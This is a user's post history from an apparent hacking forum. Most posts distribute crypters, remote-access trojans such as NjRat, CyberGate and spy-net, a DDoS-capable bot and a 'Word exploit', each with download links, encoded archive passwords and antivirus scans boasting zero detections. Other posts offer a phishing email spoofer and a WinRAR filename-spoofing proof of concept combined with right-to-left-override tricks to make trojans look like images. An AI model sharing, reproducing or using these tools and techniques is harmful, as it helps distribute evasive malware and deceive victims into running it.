Jump to content

tomyk

Active Members
  • Posts

    301
  • Joined

  • Last visited

  • Days Won

    2

Everything posted by tomyk

  1. Scan:Fucking Scan Me! - Results Download:Download Black Worm v3.5.rar
  2. https://www.sendspace.com/file/a491h0
  3. Scan:Fucking Scan Me! - Results Download:https://www.sendspace.com/file/3qak25 Password:fgrTff09Th1/ftKA base & megan
  4. tomyk

    Crypter

    tested with DC Scan:Fucking Scan Me! - Results Download:https://www.sendspace.com/file/mwcgna Password: [rar tea] Z|q~~uZ ?rot41
  5. Fucking Scan Me! - Results
  6. Scan : Fucking Scan Me! - Results Download : Download Nova pasta.rar from Sendspace.com - send big files the easy way Password : ----- .---- .---- ----- .---- .---- ----- ----- ----- .---- .---- ----- ----- ----- ----- .---- ----- .---- .---- ----- ----- .---- ----- ----- ----- .---- .---- .---- .---- ----- ----- .---- RAR TEA
  7. Download:Word_Exploit_YKW.rar at Share Send
  8. tomyk

    Crypter

    Date and Time: 5/1/2014 9:07:59 PM GMT -5 File Name: RodaCripted.exe(Cybergate Encriptado) File Size: 421.52 KB SHA1: be4b4ed570e10a6edde17892fe308d4f28a094c7 Detection: 0 of 35 (0%) Status: CLEAN AVG Free - Clean! ArcaVir - Clean! Avast - Clean! AntiVir (Avira) - Clean! BitDefender - Clean! Clam Antivirus - Clean! COMODO Internet Security - Clean! Dr.Web - Clean! eTrust-Vet - Clean! F-PROT Antivirus - Clean! F-Secure Internet Security - Clean! G Data - Clean! IKARUS Security - Clean! Kaspersky Antivirus - Clean! McAfee - Clean! MS Security Essentials - Clean! ESET NOD32 - Clean! Norman - Clean! Norton Antivirus - Clean! Panda Security - Clean! A-Squared - Clean! Quick Heal Antivirus - Clean! Solo Antivirus - Clean! Sophos - Clean! Trend Micro Internet Security - Clean! VBA32 Antivirus - Clean! Zoner AntiVirus - Clean! Ad-Aware - Clean! BullGuard - Clean! FortiClient - Clean! K7 Ultimate - Clean! NANO Antivirus - Clean! Panda CommandLine - Clean! Twister Antivirus - Clean! VIPRE - Clean! Download:Hand Crypter ByRoda Password:in imagine
  9. File name: FuD.exe Detection ratio: 0 / 30 Analysis date: Wednesday 30th of April 2014 03:30:26 PM Scan Link: Fucking Scan Me! - Results A-Squared(Emisoft AntiMalware) - Clean AhnLab V3 Internet Security - Clean ArcaVir - Clean Avast - Clean Avg - Clean Avira - Clean Ad-Aware - Clean Baidu AV - Clean BitDefender - Clean BKav - Clean BullGuard Internet Security - Clean ClamAv - Clean Comodo - Clean Dr. Web - Clean eScan - Clean eTrust-Vet - Clean ESET NOD32 - Clean Fortinet - Clean Gdata - Clean K7Ultimate - Clean Kaspersky Internet Security 2013 - Clean mcafee - Clean Microsoft Security Essentials - Clean nProtect - Clean NANO Antivirus - Clean Norton Internet Security - Clean PC Tools - Clean Solo - Clean TotalDefense - Clean Webroot - Clean 360 - Clean Download:Download Downloader by Brontok.rar Password: {125,67,-113,22,75,-46,227,104,-86,57,0};
  10. Scan:Fucking Scan Me! - Results Download:Download Game Of Thrones Crypter By F.I.G.H.T.E.R.rar Password: 01111011001100010011000000111000001011000011011000 11011100101100001100010011010100110010001011000011 01110011000000101100001100010011100000101100001100 01001101010011000000101100001100000111110100111011] binary rxbot Rar = Siiiiiggy
  11. tested with DC works 100% Scan:Fucking Scan Me! - Results Download:CRYPTER ARTISTIC PURE EDITION By LeonDk.rar — RGhost — file sharing Password:?????????????????? (Poly-Rc4) - Pastebin.com
  12. arhiva e cryptata :TEA
  13. File name: nj18April.exe Detection ratio: 1 / 30 Analysis date: Friday 18th of April 2014 10:20:32 AM Scan Link: Fucking Scan Me! - Results A-Squared(Emisoft AntiMalware) Clean AhnLab V3 Internet Security Clean ArcaVir Clean Avast Clean Avg Clean Avira TR\/Spy.411654 Trojan! Ad-Aware Clean Baidu AV Clean BitDefender Clean BKav Clean BullGuard Internet Security Clean ClamAv Clean Comodo Clean Dr. Web Clean eScan Clean eTrust-Vet Clean ESET NOD32 Clean Fortinet Clean Gdata Clean K7Ultimate Clean Kaspersky Internet Security 2013 Clean mcafee Clean Microsoft Security Essentials Clean nProtect Clean NANO Antivirus Clean Norton Internet Security Clean PC Tools Clean Solo Clean TotalDefense Clean Webroot Clean 360 Clean Download:NjRat Crypter By Mohajer.rar Password:00100010 01011100 01111000 00110110 01000001 01011100 01111000 00110110 00110110 - Pastebin.com binary rxbot and POF file
  14. tested and working with DC [info] File Name: server.exe File Size: 95232 Bytes Md5 File: caf9806ffa9d607b91c4a10c8670f43d Sha1 File: 28aa3d7da55e305e50ca76c93966733eca4bb2cc Scan Date: Saturday, March 29th 2014 | 02:58:57 Status: Infected Result: 1/35 [Detections] AVG Free-Clean ArcaVir-Clean Avast-Clean AntiVir (Avira)-Clean BitDefender-Clean VirusBuster Internet Security-Clean Clam Antivirus-Clean COMODO Internet Security-Clean Dr.Web-Trojan.Siggen6.12888 eTrust-Vet-Clean F-PROT Antivirus-Clean F-Secure Internet Security-Clean G Data-Clean IKARUS Security-Clean Kaspersky Antivirus-Clean McAfee-Clean MS Security Essentials-Clean ESET NOD32-Clean Norman-Clean Norton Antivirus-Clean Panda Security-Clean A-Squared-Clean Quick Heal Antivirus-Clean Solo Antivirus-Clean Sophos-Clean Trend Micro Internet Security-Clean VBA32 Antivirus-Clean Zoner AntiVirus-Clean Ad-Aware-Clean BullGuard-Clean Immunet Antivirus-Clean K7 Ultimate-Clean NANO Antivirus-Clean Panda CommandLine-Clean VIPRE-Clean Download:http://ge.tt/api/1/files/6SIqCkU1/0/blob?download
  15. Features: -BOTKILL -ADVANCED PERSISTANCE -STARTUP -ADVANCED PROCESS PROTECTION -CORRUPT HEADER -CRITICAL PROCESS -FILE PROTECTION -DDOS TOOLS -REMOTE DESKTOP VIEWER -SHELL CODE EXECUTION -DOWNLOAD AND EXECUTE -UNNINSTAL Server scan: [info] File Name: server.exe File Size: 31232 Bytes Md5 File: d5a1496758384c0b6e2680806f018204 Sha1 File: 28aa3d7da55e305e50ca76c93966733eca4bb2cc Scan Date: Thursday, March 27th 2014 | 12:38:31 Status: Clean Result: 0/35 [Detections] AVG Free-Clean ArcaVir-Clean Avast-Clean AntiVir (Avira)-Clean BitDefender-Clean VirusBuster Internet Security-Clean Clam Antivirus-Clean COMODO Internet Security-Clean Dr.Web-Clean eTrust-Vet-Clean F-PROT Antivirus-Clean F-Secure Internet Security-Clean G Data-Clean IKARUS Security-Clean Kaspersky Antivirus-Clean McAfee-Clean MS Security Essentials-Clean ESET NOD32-Clean Norman-Clean Norton Antivirus-Clean Panda Security-Clean A-Squared-Clean Quick Heal Antivirus-Clean Solo Antivirus-Clean Sophos-Clean Trend Micro Internet Security-Clean VBA32 Antivirus-Clean Zoner AntiVirus-Clean Ad-Aware-Clean BullGuard-Clean Immunet Antivirus-Clean K7 Ultimate-Clean NANO Antivirus-Clean Panda CommandLine-Clean VIPRE-Clean Download:http://ge.tt/api/1/files/49SlG1U1/0/blob?download
  16. tomyk

    Crypter

    tested with DC works 100% delay 30 s Scan:Fucking Scan Me! - Results Download:https://hostr.co/C35tj53b2qXA Password:----- .---- ----- ----- ----- ----- ----- .---- ----- .---- .---- ----- ----- ----- .---- .---- ----- .---- .---- ----- ----- .---- ----- .---- ----- .---- .---- .---- ----- ----- .---- .---- binary/morse
  17. E-mail Spoofer is a tool designed for penetration testers who need to send phishing e-mails. It allows to send mails to a single recipient or a list, it supports plain text/html email formats, attachments, templates and more… Features Support for Plain text and HTML E-mail Templates Spoofing Sender Address Support SMTP Authentication and SSL Single or Multiple Recipients HTML E-mail Preview Templates included:facebook,gmail,hotmail Download:EMS - E-mail Spoofer | Free Communications software downloads at SourceForge.net
      • 1
      • Downvote
  18. server scan:Fucking Scan Me! - Results Download:https://mega.co.nz/#!6xokSKTb!DlcOOgVsvLTvxhpAh8eFiSxQQIPnEJJGEAUwKKMxGaI
  19. Scan:Fucking Scan Me! - Results Download:Download BXL CRYPTER.rar from Sendspace.com - send big files the easy way Password: z0M47k1f0rr4L2lyMz9U0Q// ESAB64 RC4/Santi RC4/Sudo rar - TEA
  20. tested with DC Detection ratio: 0 / 30 Analysis date: Thursday 27th of March 2014 04:43:31 AM Scan Link: Fucking Scan Me! - Results [TABLE=width: 480] [TR] [TH]Antivirus[/TH] [TH]Result[/TH] [/TR] [TR] [TD]A-Squared(Emisoft AntiMalware)[/TD] [TD]Clean[/TD] [/TR] [TR] [TD]AhnLab V3 Internet Security[/TD] [TD]Clean[/TD] [/TR] [TR] [TD]ArcaVir[/TD] [TD]Clean[/TD] [/TR] [TR] [TD]Avast[/TD] [TD]Clean[/TD] [/TR] [TR] [TD]Avg[/TD] [TD]Clean[/TD] [/TR] [TR] [TD]Avira[/TD] [TD]Clean[/TD] [/TR] [TR] [TD]Ad-Aware[/TD] [TD]Clean[/TD] [/TR] [TR] [TD]Baidu AV[/TD] [TD]Clean[/TD] [/TR] [TR] [TD]BitDefender[/TD] [TD]Clean[/TD] [/TR] [TR] [TD]BKav[/TD] [TD]Clean[/TD] [/TR] [TR] [TD]BullGuard Internet Security[/TD] [TD]Clean[/TD] [/TR] [TR] [TD]ClamAv[/TD] [TD]Clean[/TD] [/TR] [TR] [TD]Comodo[/TD] [TD]Clean[/TD] [/TR] [TR] [TD]Dr. Web[/TD] [TD]Clean[/TD] [/TR] [TR] [TD]eScan[/TD] [TD]Clean[/TD] [/TR] [TR] [TD]eTrust-Vet[/TD] [TD]Clean[/TD] [/TR] [TR] [TD]ESET NOD32[/TD] [TD]Clean[/TD] [/TR] [TR] [TD]Fortinet[/TD] [TD]Clean[/TD] [/TR] [TR] [TD]Gdata[/TD] [TD]Clean[/TD] [/TR] [TR] [TD]K7Ultimate[/TD] [TD]Clean[/TD] [/TR] [TR] [TD]Kaspersky Internet Security 2013[/TD] [TD]Clean[/TD] [/TR] [TR] [TD]mcafee[/TD] [TD]Clean[/TD] [/TR] [TR] [TD]Microsoft Security Essentials[/TD] [TD]Clean[/TD] [/TR] [TR] [TD]nProtect[/TD] [TD]Clean[/TD] [/TR] [TR] [TD]NANO Antivirus[/TD] [TD]Clean[/TD] [/TR] [TR] [TD]Norton Internet Security[/TD] [TD]Clean[/TD] [/TR] [TR] [TD]PC Tools[/TD] [TD]Clean[/TD] [/TR] [TR] [TD]Solo[/TD] [TD]Clean[/TD] [/TR] [TR] [TD]TotalDefense[/TD] [TD]Clean[/TD] [/TR] [TR] [TD]Webroot[/TD] [TD]Clean[/TD] [/TR] [TR] [TD]360[/TD] [TD]Clean[/TD] [/TR] [/TABLE] Download:https://mega.co.nz/#!zhwwiBwJ!ry80m8_ujt5GEADmWxZ6i6uSzfY0oLcWLFrGPsA_kM4 Password: rar = TEA HireHHB9ej65HthZ base/gila/atom gasiti voi ordinea
  21. Download:VB6 Sources Naker90.rar
  22. Winrar is one of the most common application for compressing and decompressing data. The application is capble of compressing data as rar or as zip format. This Article is going to present a new Vulnerability that i found at WINRAR version 4.20 (other version maybe vulnerable to). Here is a quick brief of the zip file format: So by the file format descriptor, we can see that the Bits at offset 30 are referred to the file name of the compressed file. When we try to compress the file as "ZIP Format" with WINRAR, the file structure looks the same, but! WINRAR adds several properties of its own. For example let's look at a text file called "TEST1.txt" that contains the data "AAAAA" after it compressed as zip with WINRAR: In the example above it can be noticed that WINRAR add extra "file name" into the compressed file. Further analysis reveals that the second name is the "File Name" of the file, that WINRAR will give to the output uncompressed file, while the First name is the name that appears at the WINRAR GUI window. QUESTION: so what happens if the first name and the last name are different? ANSWER: WINRAR will show the spoofed file name, while after decompression the user will get the real file name. This Behavior can easily turned into a very dangerous security hole. Think about a hacker that publish some informative "txt" file called "ReadMe.txt" or even PDF like "VirusTotal_ScanResults.pdf" or more tempting file like"My Girl Friend new bathing suit.jpg". Think about an innocent user that will open that file and instead of getting readme file, PDF book or interesting image, he will get a nasty Trojan Horse... So let's start and build a nasty POC 1: First we goanna take some nasty file (just kidding) that will popup "PWNED" message. 2: Second we will compress it with WINRAR by choosing "WINZIP" method.2: Second we will compress it with WINRAR by choosing "WINZIP" method. 3:Finally wewill open the ZIP file with an hex editor, change the second name only, to the fake name we chose (MyPrivateImage.jpg) and save it as ZIP file. The result will be a nasty WINRAR file that shows you an image file, when you double click it, the nasty binary file will execute: This by itself is a very problematic behavior of WINRAR, but what about those people that aren't double clicking files from WINRAR windows? yes... the "Extract here" people :\ If they will see a file that called " MyPrivateImage.jpg " turning into " MyPrivateImage.exe " , well.... they will start worry Don't be afraid, for this purpose we can combine other known vulnerability for windows. This Vulnerability called "Unicode RLO Spoofing". In this technique we use the RLO Unicode character. ( Read about it here: Unicode Character 'RIGHT-TO-LEFT OVERRIDE' (U+202E)). This character can easily confuse windows to present the file "Fede.jpg.exe" into "Fedexe..jpg". Combination of these two vulnerabilities can get you the near perfect File spoofing ever When you look at it in WINRAR, you will see FEDEX.jpg And when you extract it, you will see Fedexe..jpg No matter where you run the file from , YOU'll GET PWNED ! Sursa:An7isec
  23. stub [info] File Name: STUB.exe File Size: 46592 Bytes Md5 File: xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx Sha1 File: xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx Scan Date: Tuesday, March 25th 2014 | 05:01:06 Status: Clean Result: 0/35 [Detections] AVG Free-Clean ArcaVir-Clean Avast-Clean AntiVir (Avira)-Clean BitDefender-Clean VirusBuster Internet Security-Clean Clam Antivirus-Clean COMODO Internet Security-Clean Dr.Web-Clean eTrust-Vet-Clean F-PROT Antivirus-Clean F-Secure Internet Security-Clean G Data-Clean IKARUS Security-Clean Kaspersky Antivirus-Clean McAfee-Clean MS Security Essentials-Clean ESET NOD32-Clean Norman-Clean Norton Antivirus-Clean Panda Security-Clean A-Squared-Clean Quick Heal Antivirus-Clean Solo Antivirus-Clean Sophos-Clean Trend Micro Internet Security-Clean VBA32 Antivirus-Clean Zoner AntiVirus-Clean Ad-Aware-Clean BullGuard-Clean Immunet Antivirus-Clean K7 Ultimate-Clean NANO Antivirus-Clean Panda CommandLine-Clean VIPRE-Clean syp-net File Info: File Name: spy-net.exe SHA1: xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx MD5: xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx Date|Time: 25-03-14,04:59:41 File Size: 336920 Bytes Detection: 0 of 35 Status:Clean Detections: AVG Free-Clean ArcaVir-Clean Avast-Clean AntiVir (Avira)-Clean BitDefender-Clean VirusBuster Internet Security-Clean Clam Antivirus-Clean COMODO Internet Security-Clean Dr.Web-Clean eTrust-Vet-Clean F-PROT Antivirus-Clean F-Secure Internet Security-Clean G Data-Clean IKARUS Security-Clean Kaspersky Antivirus-Clean McAfee-Clean MS Security Essentials-Clean ESET NOD32-Clean Norman-Clean Norton Antivirus-Clean Panda Security-Clean A-Squared-Clean Quick Heal Antivirus-Clean Solo Antivirus-Clean Sophos-Clean Trend Micro Internet Security-Clean VBA32 Antivirus-Clean Zoner AntiVirus-Clean Ad-Aware-Clean BullGuard-Clean Immunet Antivirus-Clean K7 Ultimate-Clean NANO Antivirus-Clean Panda CommandLine-Clean VIPRE-Clean tested with DC works 100% delay 30s Download:Download Nova pasta (2).rar from Sendspace.com - send big files the easy way Password: rar = TEA dsbt`T rot30
  24. Scan:Fucking Scan Me! - Results Download:Download Nova pasta.rar from Sendspace.com - send big files the easy way Password: rar = TEA woyppTTTT] -->rot36
  25. The search for exploits is something routine during a process Pentest, thinking that the team developed the Relax Lab Pompem - Exploit Finder. Pompem is an open source tool designed to automate the search for exploits in major Databases. Developed in Python, has a system of advanced search, thus facilitating the work of Pentesters and Ethical Hacking. In its current version, conducts research in the following Databases: Exploit-db, 1337Day, Packetstorm Security ... The installation can be done by cloning the GIT git clone https://github.com/rfunix/Pompem.git Pompem-dev Also Download the files. DOWNLOAD zip Its use is simple and intuitive, PrintScreen below its initial layout: Performing a search for telnet Exploits: The tool also provides that the result is saved in HTML, simply use the-html flag. More information and source code of the tool can be found in the GIT project: https://github.com/rfunix/Pompem/
×
×
  • Create New...